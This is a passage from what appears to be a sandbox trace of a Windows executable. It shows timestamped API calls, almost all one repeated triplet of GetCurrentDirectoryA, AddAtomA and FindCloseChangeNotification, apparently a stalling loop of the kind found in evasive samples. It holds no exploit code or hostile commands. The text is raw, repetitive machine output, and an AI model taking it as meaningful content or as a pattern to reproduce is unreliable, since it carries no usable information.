lpBuffer="Module32FirstW") returned 0x26 [0079.836] AddAtomA (lpString=0x0) returned 0x0 [0079.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.836] AddAtomA (lpString=0x0) returned 0x0 [0079.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.836] AddAtomA (lpString=0x0) returned 0x0 [0079.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.836] AddAtomA (lpString=0x0) returned 0x0 [0079.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.837] AddAtomA (lpString=0x0) returned 0x0 [0079.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.837] AddAtomA (lpString=0x0) returned 0x0 [0079.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.837] AddAtomA (lpString=0x0) returned 0x0 [0079.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.837] AddAtomA (lpString=0x0) returned 0x0 [0079.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.837] AddAtomA (lpString=0x0) returned 0x0 [0079.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.838] AddAtomA (lpString=0x0) returned 0x0 [0079.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.838] AddAtomA (lpString=0x0) returned 0x0 [0079.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.838] AddAtomA (lpString=0x0) returned 0x0 [0079.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.838] AddAtomA (lpString=0x0) returned 0x0 [0079.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.838] AddAtomA (lpString=0x0) returned 0x0 [0079.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.839] AddAtomA (lpString=0x0) returned 0x0 [0079.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.839] AddAtomA (lpString=0x0) returned 0x0 [0079.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.839] AddAtomA (lpString=0x0) returned 0x0 [0079.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.839] AddAtomA (lpString=0x0) returned 0x0 [0079.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.839] AddAtomA (lpString=0x0) returned 0x0 [0079.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.839] AddAtomA (lpString=0x0) returned 0x0 [0079.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.840] AddAtomA (lpString=0x0) returned 0x0 [0079.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.841] AddAtomA (lpString=0x0) returned 0x0 [0079.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.842] AddAtomA (lpString=0x0) returned 0x0 [0079.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.843] AddAtomA (lpString=0x0) returned 0x0 [0079.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.844] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.845] AddAtomA (lpString=0x0) returned 0x0 [0079.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.846] AddAtomA (lpString=0x0) returned 0x0 [0079.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.847] AddAtomA (lpString=0x0) returned 0x0 [0079.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.847] AddAtomA (lpString=0x0) returned 0x0 [0079.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.847] AddAtomA (lpString=0x0) returned 0x0 [0079.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.847] AddAtomA (lpString=0x0) returned 0x0 [0079.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.847] AddAtomA (lpString=0x0) returned 0x0 [0079.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.847] AddAtomA (lpString=0x0) returned 0x0 [0079.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.847] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.847] AddAtomA (lpString=0x0) returned 0x0 [0079.847] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.848] AddAtomA (lpString=0x0) returned 0x0 [0079.848] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.848] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.943] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.943] AddAtomA (lpString=0x0) returned 0x0 [0079.943] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.944] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.944] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.944] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, 